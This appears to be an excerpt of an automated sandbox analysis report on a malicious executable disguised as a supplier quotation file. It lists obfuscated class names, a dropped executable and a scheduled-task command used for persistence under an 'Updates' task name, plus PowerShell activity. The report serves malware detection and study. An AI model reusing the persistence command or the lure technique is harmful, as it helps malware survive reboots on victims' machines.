Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, OXmYbftiauxP9AL5jO.cs	High entropy of concatenated method names: 'DMwu6TRik5', 'NhSuEjTsaG', 'dmZuJ8vPmG', 'SdrujgMWhH', 'tRUuldYXAF', 'YNfuA1Kq3t', 'EWuuphbenQ', 'qqcuts3nbt', 'hP7ue5DhFF', 'up9uqpOyi9'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, KG4olSYldb1sA0V8RF.cs	High entropy of concatenated method names: 'IxosJTktd', 'uwNn5QbU1', 'ndSK9jhwL', 'xOd9HdXsM', 'lgkNcn3O9', 'nTbRnTXus', 'PJcUlQ34R9v6OwRm9F', 'd3YQJkKCFxSkjsUI46', 'RwHiJWFxZ', 'olfffixYq'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, IXLn1HNCQlONxWmLsv.cs	High entropy of concatenated method names: 'zLQjn72Bbl', 'vYSjKZVpb8', 'Br8jcBrLOL', 'OQajNds1B8', 'N5Qjvj0OCX', 'YExjZU6yys', 'dCYjajOvgJ', 'NkNjisibkK', 'nUEjX0qh44', 'B2DjfUOaO5'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, d91LhKkasGagSZPIlt.cs	High entropy of concatenated method names: 'KCfaqi7vcG', 'u53aGu4Twl', 'ToString', 'gvFaEodvQu', 'nTvaJQHycH', 'm0bajJCRTG', 'Tt2alqAZUF', 'C8SaA7GAXG', 'aOHap9VP7i', 'KCLatPVYCh'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, x3T9Ytw1Zeo1bprUX1.cs	High entropy of concatenated method names: 'RmspEnaafS', 'u2gpjuOXwa', 'UpgpA6eQK1', 'LhAA0jkn0h', 'Pu5AzF54bE', 'vAepLVqdqw', 'II7pMVGHM3', 'wDApY4eabA', 'fmppuKiawY', 'LEqpbofcad'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, THX12LMbpUTAhaBFVoE.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ds1HXU5brq', 'Q6THfENk30', 'bojHOJ4lxP', 'nQCHHNpZjc', 'T62HDYp5AA', 'oRYH3lEb4S', 'YbfHTGiEZv'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, WI4re4rlxdWBEC7k2o.cs	High entropy of concatenated method names: 'tnVA6wSEGv', 'J4AAJYZ9oi', 'LKAAl5qv9w', 'DlhApuveV9', 'cjTAt1DMx5', 'fB8lCwd4c2', 'Oe9lW2mx2d', 'jPJlgnG2jd', 'XwEl1XUDkV', 'Xm3lIgqmid'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, hKbC3fIwQJBD85kemO.cs	High entropy of concatenated method names: 'VmaXr4fPMa', 'A8IXh2aMeG', 'rXCX5EHtyh', 'zUAXdgCOjm', 'scBXQ9J23a', 'pL4XUgiTph', 'KMwXw6HVbq', 'oFrXxGMKh6', 'I6lX7xZBLl', 'lRUXP35JOM'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, WRp4DPbfMDTyk1O1Po.cs	High entropy of concatenated method names: 'rCJMpkQPIS', 'WjIMtfgwhQ', 'uCQMqlONxW', 'QLsMGvQYSC', 'vdfMvNmgI4', 'Ge4MZlxdWB', 'VxAH6WkD1hgGm2tLwP', 'vPMfZ2ZkkxSr2bXsA3', 'mESMMMGwIa', 'MAGMunlXh1'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, fkQPIScgjIfgwhQwC4.cs	High entropy of concatenated method names: 'InjJmQpfDL', 'd1QJyWnffc', 'CtdJFJTxa5', 'ddgJkmGZce', 'EehJCr1xSL', 'NKvJWUmgGJ', 'WwwJgmw8lZ', 'wriJ1AiDj5', 'jrUJIZjNy0', 'sjaJ0KMWcH'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, dAK0Jo7pGEwxjjvoZ9.cs	High entropy of concatenated method names: 'KGPp8igC05', 'uP9pVoucy9', 'n97ps73p8y', 'BjLpn6A7MZ', 'hoEp2nwJ4n', 'tHMpKihQTt', 'Wv8p9jhHqE', 'B73pc58qHb', 'feQpNqE0bI', 'lwtpRnQWmn'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, uHYtq8JGWgdmDkrnFe.cs	High entropy of concatenated method names: 'Dispose', 'MvoMI9PEDs', 'TC5YhurOt7', 'kOqHKpLdsS', 'U62M0w4T6o', 'lNgMzsP2rM', 'ProcessDialogKey', 'pEjYLKbC3f', 'LQJYMBD85k', 'kmOYY3enPD'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, U89jwOmf6bjtiChj87.cs	High entropy of concatenated method names: 'xWdvPe8pGa', 'wqhvB3ijYe', 'QRPvmWgukT', 'D7svyfy7IY', 'EMrvhlAthy', 'CJJv5kGeJd', 'WXnvdaJXeo', 'hAyvQJPFKK', 'DVmvURY217', 'jytvwpvPqU'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, JYSCnPRc3nAZm3dfNm.cs	High entropy of concatenated method names: 'Pyol20s7W6', 'mA3l9sD9Ck', 'hDcj5kOJFG', 'EBsjdpF1q4', 'QVIjQT5IbC', 'NpFjUlEqO3', 'o1Bjw3KxRo', 'JMSjxVnin9', 'wP6j7j8buK', 'rq0jP6iTd7'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, EaKXsxMMEduJxGG4xjT.cs	High entropy of concatenated method names: 'miKf0wUfkk', 'Hn0fzkQwjH', 'yoqOLi8T1V', 'eb1OMcHqn6', 'nolOYCfn8D', 'C8ROuOxVeu', 'ildObF2eJg', 'f2kO63Dshp', 'NTAOEMvRhG', 'tj7OJXA6sC'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, DjPSAiMLZHPXieDTNDF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ka2foocHSM', 'MYvfBEU5UY', 'i1wf4HDXfS', 'mL6fm8Ckr2', 'OZNfyJDkNx', 'iMRfFZqOqm', 'AxTfkGAhbn'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, GSBw9m4TudYHHyonnQ.cs	High entropy of concatenated method names: 'K1dScNvaZG', 'zoeSNXwywR', 'lbXSryrlqg', 'x1vShLGi4l', 'gWTSdgh0iq', 'bkhSQamrRc', 'FMtSwaYHq5', 'HjASxJ1u4S', 'yipSPEseR8', 'HZJSod7A3b'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, oQwkqegZB7vo9PEDsC.cs	High entropy of concatenated method names: 'RcOXvqMnX4', 'U6cXa48dT5', 'xfyXXrZGVN', 'hBlXOP16TJ', 'p4gXDQIvy7', 'oQ3XTa1HKk', 'Dispose', 'enliE5niuB', 'U8qiJfSWec', 'DPxijSktNu'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, sKaGDFhd7daKD2HCDM.cs	High entropy of concatenated method names: 'JQJVuYoeFhMwySvlT1g', 'Sj9ELUo2WPOAiYSiX1f', 'twvAi8lZZE', 'IHLAXItvT5', 'GJHAfT4Y9A', 'A10KeuoAtms8ixlp7Ct', 'BuE8rbonhCYeyRpqidW'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, pStGwHWAhZDI9vOfIH.cs	High entropy of concatenated method names: 'kWka1OPE1q', 'suga0eQOUe', 'LvViLxThG6', 'YQIiM6blDZ', 'QEhaotNRXE', 'q6kaB4GV6H', 'M8va4Ox3t7', 'EENamF3ufu', 's29ayALexb', 'HJbaFDrctS'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, wenPDN0lV2brx5PPTj.cs	High entropy of concatenated method names: 'efKfjTmFr3', 'pF3flaBE41', 'G00fARe2TL', 'wF7fp3Usdg', 'l25fXrV2Ns', 'QPGft9Z9XC', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, CbSV3bzym8O87TbSJt.cs	High entropy of concatenated method names: 'P7AfKVt4HX', 'MyyfccLB1j', 'lcRfNJoiIr', 'DfYfrUVS9s', 'FJmfhmGkX8', 'DYkfdZ8jlU', 'TSJfQL6HpL', 'NllfT1embw', 'dcKf8mxjcu', 'L0dfVnwEfq'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, OXmYbftiauxP9AL5jO.cs	High entropy of concatenated method names: 'DMwu6TRik5', 'NhSuEjTsaG', 'dmZuJ8vPmG', 'SdrujgMWhH', 'tRUuldYXAF', 'YNfuA1Kq3t', 'EWuuphbenQ', 'qqcuts3nbt', 'hP7ue5DhFF', 'up9uqpOyi9'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, KG4olSYldb1sA0V8RF.cs	High entropy of concatenated method names: 'IxosJTktd', 'uwNn5QbU1', 'ndSK9jhwL', 'xOd9HdXsM', 'lgkNcn3O9', 'nTbRnTXus', 'PJcUlQ34R9v6OwRm9F', 'd3YQJkKCFxSkjsUI46', 'RwHiJWFxZ', 'olfffixYq'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, IXLn1HNCQlONxWmLsv.cs	High entropy of concatenated method names: 'zLQjn72Bbl', 'vYSjKZVpb8', 'Br8jcBrLOL', 'OQajNds1B8', 'N5Qjvj0OCX', 'YExjZU6yys', 'dCYjajOvgJ', 'NkNjisibkK', 'nUEjX0qh44', 'B2DjfUOaO5'
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, d91LhKkasGagSZPIlt.cs	High entropy of concatenated method names: 'KCfaqi7vcG', 'u53aGu4Twl', 'ToString', 'gvFaEodvQu', 'nTvaJQHycH', 'm0bajJCRTG', 'Tt2alqAZUF', 'C8SaA7GAXG', 'aOHap9VP7i', 'KCLatPVYCh'

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

File created: C:\Users\user\AppData\Roaming\nDEusQ.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
